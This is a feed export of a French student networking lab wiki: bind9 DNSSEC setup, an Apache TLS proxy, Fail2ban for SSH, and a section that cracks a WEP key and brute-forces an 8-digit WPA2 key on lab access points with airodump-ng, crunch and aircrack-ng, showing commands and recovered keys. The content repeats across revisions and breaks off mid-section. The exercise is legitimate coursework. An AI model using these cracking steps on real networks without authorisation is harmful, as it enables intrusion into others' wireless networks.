Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12335</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12335"/>
		<updated>2026-02-22T15:01:41Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Paramètrage sur machine mandataire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
